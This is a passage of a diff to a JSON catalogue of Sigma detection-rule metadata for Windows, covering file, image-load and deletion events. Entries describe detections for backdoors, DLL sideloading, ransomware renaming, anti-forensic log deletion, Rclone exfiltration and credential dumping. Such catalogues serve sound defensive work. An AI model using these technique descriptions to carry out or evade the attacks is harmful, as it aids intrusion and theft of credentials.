"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_winword_startup.yml" ], "tags": [ - "attack.lateral_movement", - "attack.t1546.002" + "attack.resource_development", + "attack.t1587.001" ] }, - "uuid": "4aafb0fa-bff5-4b9d-b99e-8093e659c65f", - "value": "Writing Local Admin Share" + "uuid": "a10a2c40-2c4d-49f8-b557-1a946bc55d9d", + "value": "Creation In User Word Startup Folder" + }, + { + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/05/05", + "falsepositive": [ + "Very unlikely" + ], + "filename": "file_event_win_pingback_backdoor.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_pingback_backdoor.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1574.001" + ] + }, + "uuid": "2bd63d53-84d4-4210-80ff-bf0658f1bf78", + "value": "Pingback Backdoor - File" + }, + { + "description": "Detects Rclone config file being created", + "meta": { + "author": "Aaron Greetham (@beardofbinary) - NCC Group", + "creation_date": "2021/05/26", + "falsepositive": [ + "Legitimate Rclone usage (rare)" + ], + "filename": "file_event_win_rclone_exec_file.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_rclone_exec_file.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567.002" + ] + }, + "uuid": "34986307-b7f4-49be-92f3-e7a4d01ac5db", + "value": "Rclone Config File Creation" + }, + { + "description": "Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)\nbut with a space in order to trick DLL load search order and perform a \"DLL Search Order Hijacking\" attack\n", + "meta": { + "author": "frack113, Nasreddine Bencherchali", + "creation_date": "2022/07/30", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_dll_sideloading_space_path.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/cyb3rops/status/1552932770464292864", + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_dll_sideloading_space_path.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "b6f91281-20aa-446a-b986-38a92813a18f", + "value": "DLL Search Order Hijackig Via Additional Space in Path" + }, + { + "description": "Detects the creation of tasks from processes executed from suspicious locations", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/11/16", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_susp_task_write.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_task_write.yml" + ], + "tags": [ + "attack.persistence", + "attack.execution", + "attack.t1053" + ] + }, + "uuid": "80e1f67a-4596-4351-98f5-a9c3efabac95", + "value": "Suspicious Scheduled Task Write to System32 Tasks" + }, + { + "description": "Detects possible ransomware adding a custom extension to the encrypted files, such as \".jpg.crypted\", \".docx.locky\" etc.", + "meta": { + "author": "frack113", + "creation_date": "2022/07/16", + "falsepositive": [ + "Backup software" + ], + "filename": "file_rename_win_ransomware.yml", + "level": "medium", + "logsource.category": "file_rename", + "logsource.product": "windows", + "refs": [ + "https://blog.cyble.com/2022/08/10/onyx-ransomware-renames-its-leak-site-to-vsop/", + "https://app.any.run/tasks/d66ead5a-faf4-4437-93aa-65785afaf9e5/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_rename/file_rename_win_ransomware.yml" + ], + "tags": [ + "attack.impact", + "attack.t1486" + ] + }, + "uuid": "e3f673b3-65d1-4d80-9146-466f8b63fa99", + "value": "Suspicious Appended Extension" }, { "description": "Detects cases in which a file gets renamed to .dll, which often happens to bypass perimeter protection", @@ -25140,1914 +27314,452 @@ "value": "Rename Common File to DLL File" }, { - "description": "Detects possible ransomware adding a custom extension to the encrypted files, such as \".jpg.crypted\", \".docx.locky\" etc.", + "description": "Detects the deletion of WebServer access logs which may indicate an attempt to destroy forensic evidence", "meta": { - "author": "frack113", - "creation_date": "2022/07/16", + "author": "Tim Rauch", + "creation_date": "2022/09/16", "falsepositive": [ - "Backup software" + "During uninstallation of the IIS service", + "During log rotation" ], - "filename": "file_rename_win_ransomware.yml", + "filename": "file_delete_win_webserver_access_logs_deleted.yml", "level": "medium", - "logsource.category": "file_rename", + "logsource.category": "file_delete", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/d66ead5a-faf4-4437-93aa-65785afaf9e5/", - "https://blog.cyble.com/2022/08/10/onyx-ransomware-renames-its-leak-site-to-vsop/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_rename/file_rename_win_ransomware.yml" + "https://www.elastic.co/guide/en/security/current/webserver-access-logs-deleted.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_webserver_access_logs_deleted.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070" + ] + }, + "uuid": "3eb8c339-a765-48cc-a150-4364c04652bf", + "value": "WebServer Access Logs Deleted" + }, + { + "description": "Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.", + "meta": { + "author": "frack113", + "creation_date": "2022/01/02", + "falsepositive": [ + "Legitime usage" + ], + "filename": "file_delete_win_delete_backup_file.yml", + "level": "medium", + "logsource.category": "file_delete", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-6---windows---delete-backup-files", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_backup_file.yml" ], "tags": [ "attack.impact", - "attack.t1486" + "attack.t1490" ] }, - "uuid": "e3f673b3-65d1-4d80-9146-466f8b63fa99", - "value": "Suspicious Appended Extension" + "uuid": "06125661-3814-4e03-bfa2-1e4411c60ac3", + "value": "Deletes Backup Files" }, { - "description": "Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account)\nwanting to perform SSO authentication in the browser.\nAn attacker can use this to authenticate to Azure AD in a browser as that user.\n", + "description": "A General detection to trigger for the deletion of files by Sysinternals SDelete. It looks for the common name pattern used to rename files.", "meta": { - "author": "Den Iuzvyk", - "creation_date": "2020/07/15", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/05/02", "falsepositive": [ - "Unknown" + "Legitime usage of SDelete" ], - "filename": "image_load_abusing_azure_browser_sso.yml", - "level": "high", - "logsource.category": "image_load", + "filename": "file_delete_win_sysinternals_sdelete_file_deletion.yml", + "level": "medium", + "logsource.category": "file_delete", "logsource.product": "windows", "refs": [ - "https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_abusing_azure_browser_sso.yml" + "https://github.com/OTRF/detection-hackathon-apt29/issues/9", + "https://threathunterplaybook.com/evals/apt29/detections/4.B.4_83D62033-105A-4A02-8B75-DAB52D8D51EC.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml" ], "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.002" + "attack.t1070.004" ] }, - "uuid": "50f852e6-af22-4c78-9ede-42ef36aa3453", - "value": "Abusing Azure Browser SSO" + "uuid": "6ddab845-b1b8-49c2-bbf7-1a11967f64bc", + "value": "Sysinternals SDelete File Deletion" }, { - "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "description": "Deletion of log files is a known anti-forensic technique", "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2019/09/12", + "author": "frack113", + "creation_date": "2022/01/16", "falsepositive": [ "Unknown" ], - "filename": "image_load_alternate_powershell_hosts_moduleload.yml", + "filename": "file_delete_win_delete_appli_log.yml", "level": "low", - "logsource.category": "image_load", + "logsource.category": "file_delete", "logsource.product": "windows", "refs": [ - "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190610201010.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_alternate_powershell_hosts_moduleload.yml" + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_appli_log.yml" ], "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1070.004" ] }, - "uuid": "fe6e002f-f244-4278-9263-20e4b593827f", - "value": "Alternate PowerShell Hosts - Image" + "uuid": "b1decb61-ed83-4339-8e95-53ea51901720", + "value": "Delete Log from Application" }, { - "description": "Detects loading of Microsoft Defender's DLLs by its processes (MpCmdRun and NisSrv) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "description": "Detects the deletion of a prefetch file (AntiForensic)", + "meta": { + "author": "Cedric MAURUGEON", + "creation_date": "2021/09/29", + "falsepositive": [ + "Unknown" + ], + "filename": "file_delete_win_delete_prefetch.yml", + "level": "high", + "logsource.category": "file_delete", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_prefetch.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ] + }, + "uuid": "0a1f9d29-6465-4776-b091-7f43b26e4c89", + "value": "Prefetch File Deletion" + }, + { + "description": "Detect DLL deletions from Spooler Service driver folder", "meta": { "author": "Bhabesh Raj", - "creation_date": "2022/08/02", + "creation_date": "2021/07/01", "falsepositive": [ - "Very unlikely" + "Unknown" ], - "filename": "image_load_defender_load_dll_from_nondefault_path.yml", + "filename": "file_delete_win_cve_2021_1675_printspooler_del.yml", "level": "high", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_defender_load_dll_from_nondefault_path.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ] - }, - "uuid": "418dc89a-9808-4b87-b1d7-e5ae0cb6effc", - "value": "Microsoft Defender Loading DLL from Nondefault Path" - }, - { - "description": "Detects DLL image load activity as used by FoggyWeb backdoor loader", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/09/27", - "falsepositive": [ - "Unlikely" - ], - "filename": "image_load_foggyweb_nobelium.yml", - "level": "critical", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_foggyweb_nobelium.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1587" - ] - }, - "uuid": "640dc51c-7713-4faa-8a0e-e7c0d9d4654c", - "value": "FoggyWeb Backdoor DLL Loading" - }, - { - "description": "Detects loading of essential DLL used by PowerShell, but not by the process powershell.exe. Detects meterpreter's \"load powershell\" extension.", - "meta": { - "author": "Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton", - "creation_date": "2019/11/14", - "falsepositive": [ - "Used by some .NET binaries, minimal on user workstation.", - "Used by Microsoft SQL Server Management Studio" - ], - "filename": "image_load_in_memory_powershell.yml", - "level": "medium", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://adsecurity.org/?p=2921", - "https://github.com/p3nt4/PowerShdll", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_in_memory_powershell.yml" - ], - "tags": [ - "attack.t1059.001", - "attack.execution" - ] - }, - "uuid": "092bc4b9-3d1d-43b4-a6b4-8c8acd83522f", - "value": "In-memory PowerShell" - }, - { - "description": "Detects certain DLL loads when Mimikatz gets executed", - "meta": { - "author": "sigma", - "creation_date": "2017/03/13", - "falsepositive": [ - "Unknown" - ], - "filename": "image_load_mimikatz_inmemory_detection.yml", - "level": "medium", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://securityriskadvisors.com/blog/post/detecting-in-memory-mimikatz/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_mimikatz_inmemory_detection.yml" - ], - "tags": [ - "attack.s0002", - "attack.t1003", - "attack.lateral_movement", - "attack.credential_access", - "car.2019-04-004" - ] - }, - "uuid": "c0478ead-5336-46c2-bd5e-b4c84bc3a36e", - "value": "Mimikatz In-Memory" - }, - { - "description": "Detects both of CVE-2022-30190 / Follina and DogWalk vulnerability exploiting msdt.exe binary to load sdiageng.dll binary", - "meta": { - "author": "Greg (rule)", - "creation_date": "2022/06/17", - "falsepositive": [ - "Unknown" - ], - "filename": "image_load_msdt_sdiageng.yml", - "level": "high", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://www.securonix.com/blog/detecting-microsoft-msdt-dogwalk/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_msdt_sdiageng.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1202", - "cve.2022.30190" - ] - }, - "uuid": "ec8c4047-fad9-416a-8c81-0f479353d7f6", - "value": "MSDT.exe Loading Diagnostic Library" - }, - { - "description": "Detects processes loading modules related to PCRE.NET package", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/10/29", - "falsepositive": [ - "Unknown" - ], - "filename": "image_load_pcre_net_load.yml", - "level": "high", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/rbmaslen/status/1321859647091970051", - "https://twitter.com/tifkin_/status/1321916444557365248", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_pcre_net_load.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "84b0a8f3-680b-4096-a45b-e9a89221727c", - "value": "PCRE.NET Package Image Load" - }, - { - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2021/05/05", - "falsepositive": [ - "Very unlikely" - ], - "filename": "image_load_pingback_backdoor.yml", - "level": "high", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel", - "https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_pingback_backdoor.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1574.001" - ] - }, - "uuid": "35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b", - "value": "Pingback Backdoor - Image" - }, - { - "description": "Detects rundll32 loading a renamed comsvcs.dll to dump process memory", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/14", - "falsepositive": [ - "Unlikely" - ], - "filename": "image_load_rundll32_loading_renamed_comsvcs.yml", - "level": "high", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/sbousseaden/status/1555200155351228419", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_rundll32_loading_renamed_comsvcs.yml" - ], - "tags": [ - "attack.credential_access", - "attack.defense_evasion", - "attack.t1003.001" - ] - }, - "uuid": "8cde342c-ba48-4b74-b615-172c330f2e93", - "value": "Rundll32 Loading Renamed Comsvcs DLL" - }, - { - "description": "Detects signs of the WMI script host process %SystemRoot%\\system32\\wbem\\scrcons.exe functionality being used via images being loaded by a process.", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/09/02", - "falsepositive": [ - "Legitimate event consumers", - "Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button" - ], - "filename": "image_load_scrcons_imageload_wmi_scripteventconsumer.yml", - "level": "medium", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/HunterPlaybook/status/1301207718355759107", - "https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-1-wmi-event-subscription/", - "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-200902020333.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_scrcons_imageload_wmi_scripteventconsumer.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.003" - ] - }, - "uuid": "b439f47d-ef52-4b29-9a2f-57d8a96cb6b8", - "value": "WMI Script Host Process Image Loaded" - }, - { - "description": "Detects DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc", - "meta": { - "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", - "creation_date": "2022/08/17", - "falsepositive": [ - "Applications that load the same dlls mentioned in the detection section. Investigate them and filter them out if a lot FPs are caused.", - "Dell SARemediation plugin folder (C:\\Program Files\\Dell\\SARemediation\\plugin\\log.dll) is known to contain the 'log.dll' file.", - "The Canon MyPrinter folder 'C:\\Program Files\\Canon\\MyPrinter\\' is known to contain the 'log.dll' file" - ], - "filename": "image_load_side_load_antivirus.yml", - "level": "medium", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://hijacklibs.net/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_antivirus.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ] - }, - "uuid": "552b6b65-df37-4d3e-a258-f2fc4771ae54", - "value": "Antivirus Software DLL Sideloading" - }, - { - "description": "Detects DLL sideloading of \"dbgcore.dll\"", - "meta": { - "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", - "creation_date": "2022/10/25", - "falsepositive": [ - "Legitimate applications loading their own versions of the DLL mentioned in this rule" - ], - "filename": "image_load_side_load_dbgcore_dll.yml", - "level": "medium", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://hijacklibs.net/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_dbgcore_dll.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ] - }, - "uuid": "9ca2bf31-0570-44d8-a543-534c47c33ed7", - "value": "DLL Sideloading Of DBGCORE.DLL" - }, - { - "description": "Detects DLL sideloading of \"dbghelp.dll\"", - "meta": { - "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", - "creation_date": "2022/10/25", - "falsepositive": [ - "Legitimate applications loading their own versions of the DLL mentioned in this rule" - ], - "filename": "image_load_side_load_dbghelp_dll.yml", - "level": "medium", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://hijacklibs.net/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_dbghelp_dll.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ] - }, - "uuid": "6414b5cd-b19d-447e-bb5e-9f03940b5784", - "value": "DLL Sideloading Of DBGHELP.DLL" - }, - { - "description": "Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64...)", - "meta": { - "author": "Nasreddine Bencherchali, Wietze Beukema (project and research), Chris Spehn (research WFH Dridex), XForceIR (SideLoadHunter Project)", - "creation_date": "2022/08/14", - "falsepositive": [ - "Legitimate applications loading their own versions of the DLLs mentioned in this rule" - ], - "filename": "image_load_side_load_from_non_system_location.yml", - "level": "medium", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://hijacklibs.net/", - "https://blog.cyble.com/2022/07/21/qakbot-resurfaces-with-new-playbook/", - "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/", - "https://github.com/XForceIR/SideLoadHunter/blob/cc7ef2e5d8908279b0c4cee4e8b6f85f7b8eed52/SideLoads/README.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_from_non_system_location.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ] - }, - "uuid": "4fc0deee-0057-4998-ab31-d24e46e0aba4", - "value": "System DLL Sideloading From Non System Locations" - }, - { - "description": "Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location", - "meta": { - "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", - "creation_date": "2022/08/17", - "falsepositive": [ - "Unlikely" - ], - "filename": "image_load_side_load_office_dlls.yml", - "level": "medium", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://hijacklibs.net/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_office_dlls.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ] - }, - "uuid": "829a3bdf-34da-4051-9cf4-8ed221a8ae4f", - "value": "Microsoft Office DLL Sideload" - }, - { - "description": "Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/12/01", - "falsepositive": [ - "Unknown" - ], - "filename": "image_load_side_load_scm.yml", - "level": "medium", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://decoded.avast.io/martinchlumecky/png-steganography/", - "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_scm.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ] - }, - "uuid": "bc3cc333-48b9-467a-9d1f-d44ee594ef48", - "value": "SCM DLL Sideload" - }, - { - "description": "Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)", - "meta": { - "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", - "creation_date": "2022/08/17", - "falsepositive": [ - "Unknown" - ], - "filename": "image_load_side_load_third_party.yml", - "level": "medium", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://hijacklibs.net/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_third_party.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ] - }, - "uuid": "f9df325d-d7bc-4a32-8a1a-2cc61dcefc63", - "value": "Third Party Software DLL Sideloading" - }, - { - "description": "Detects DLL sideloading of VMGuestLib.dll by the WmiApSrv service.", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/12/01", - "falsepositive": [ - "FP could occure if the legitimate version of vmGuestLib already exists on the system" - ], - "filename": "image_load_side_load_vmguestlib.yml", - "level": "medium", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://decoded.avast.io/martinchlumecky/png-steganography/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_vmguestlib.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ] - }, - "uuid": "70e8e9b4-6a93-4cb7-8cde-da69502e7aff", - "value": "VMGuestLib DLL Sideload" - }, - { - "description": "Detects DLL sideloading of DLLs that are part of web browsers", - "meta": { - "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", - "creation_date": "2022/08/17", - "falsepositive": [ - "Unknown" - ], - "filename": "image_load_side_load_web_browsers.yml", - "level": "medium", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://hijacklibs.net/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_web_browsers.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ] - }, - "uuid": "72ca7c75-bf85-45cd-aca7-255d360e423c", - "value": "Web Browsers DLL Sideloading" - }, - { - "description": "Detects SILENTTRINITY stager use", - "meta": { - "author": "Aleksey Potapov, oscd.community", - "creation_date": "2019/10/22", - "falsepositive": [ - "Unknown" - ], - "filename": "image_load_silenttrinity_stage_use.yml", - "level": "high", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://github.com/byt3bl33d3r/SILENTTRINITY", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_silenttrinity_stage_use.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071" - ] - }, - "uuid": "75c505b1-711d-4f68-a357-8c3fe37dbf2d", - "value": "SILENTTRINITY Stager Execution - DLL" - }, - { - "description": "Detect DLL Load from Spooler Service backup folder", - "meta": { - "author": "FPT.EagleEye, Thomas Patzke (improvements)", - "creation_date": "2021/06/29", - "falsepositive": [ - "Loading of legitimate driver" - ], - "filename": "image_load_spoolsv_dll_load.yml", - "level": "informational", - "logsource.category": "image_load", + "logsource.category": "file_delete", "logsource.product": "windows", "refs": [ "https://github.com/hhlxf/PrintNightmare", - "https://github.com/ly4k/SpoolFool", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_spoolsv_dll_load.yml" + "https://github.com/cube0x0/CVE-2021-1675", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_cve_2021_1675_printspooler_del.yml" ], "tags": [ "attack.persistence", "attack.defense_evasion", "attack.privilege_escalation", "attack.t1574", - "cve.2021.1675", - "cve.2021.34527" + "cve.2021.1675" ] }, - "uuid": "02fb90de-c321-4e63-a6b9-25f4b03dfd14", - "value": "Windows Spooler Service Suspicious Binary Load" + "uuid": "5b2bbc47-dead-4ef7-8908-0cf73fcbecbf", + "value": "Windows Spooler Service Suspicious File Deletion" }, { - "description": "Detects the load of advapi31.dll by a process running in an uncommon folder", + "description": "Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", "meta": { - "author": "frack113", - "creation_date": "2022/02/03", + "author": "Tim Rauch", + "creation_date": "2022/09/27", "falsepositive": [ "Unknown" ], - "filename": "image_load_susp_advapi32_dll.yml", - "level": "informational", - "logsource.category": "image_load", + "filename": "file_delete_win_unusual_deletion_by_dns_exe.yml", + "level": "high", + "logsource.category": "file_delete", "logsource.product": "windows", "refs": [ - "https://github.com/hlldz/Phant0m", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_advapi32_dll.yml" + "https://www.elastic.co/guide/en/security/current/unusual-file-modification-by-dns.exe.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_unusual_deletion_by_dns_exe.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1133" + ] + }, + "uuid": "8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0", + "value": "Unusual File Deletion by dns.exe" + }, + { + "description": "Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/26", + "falsepositive": [ + "Possible FP during log rotation" + ], + "filename": "file_delete_win_exchange_powershell_logs.yml", + "level": "high", + "logsource.category": "file_delete", + "logsource.product": "windows", + "refs": [ + "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_exchange_powershell_logs.yml" ], "tags": [ "attack.defense_evasion", "attack.t1070" ] }, - "uuid": "d813d662-785b-42ca-8b4a-f7457d78d5a9", - "value": "Suspicious Load of Advapi31.dll" + "uuid": "a55349d8-9588-4c5a-8e3b-1925fe2a4ffe", + "value": "Exchange PowerShell Cmdlet History Deleted" }, { - "description": "Detects cmstp loading \"dll\" or \"ocx\" files from suspicious locations", + "description": "Detects suspicious processes based on name and location that access the windows credential manager and vault.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::cred\" function\n", "meta": { "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/30", + "creation_date": "2022/10/11", "falsepositive": [ - "Unikely" + "Legitimate software installed by the users for example in the \"AppData\" directory may access these files (for any reason)." ], - "filename": "image_load_susp_cmstp.yml", - "level": "high", - "logsource.category": "image_load", + "filename": "file_access_win_credential_manager_stealing.yml", + "level": "medium", + "logsource.category": "file_access", "logsource.product": "windows", "refs": [ - 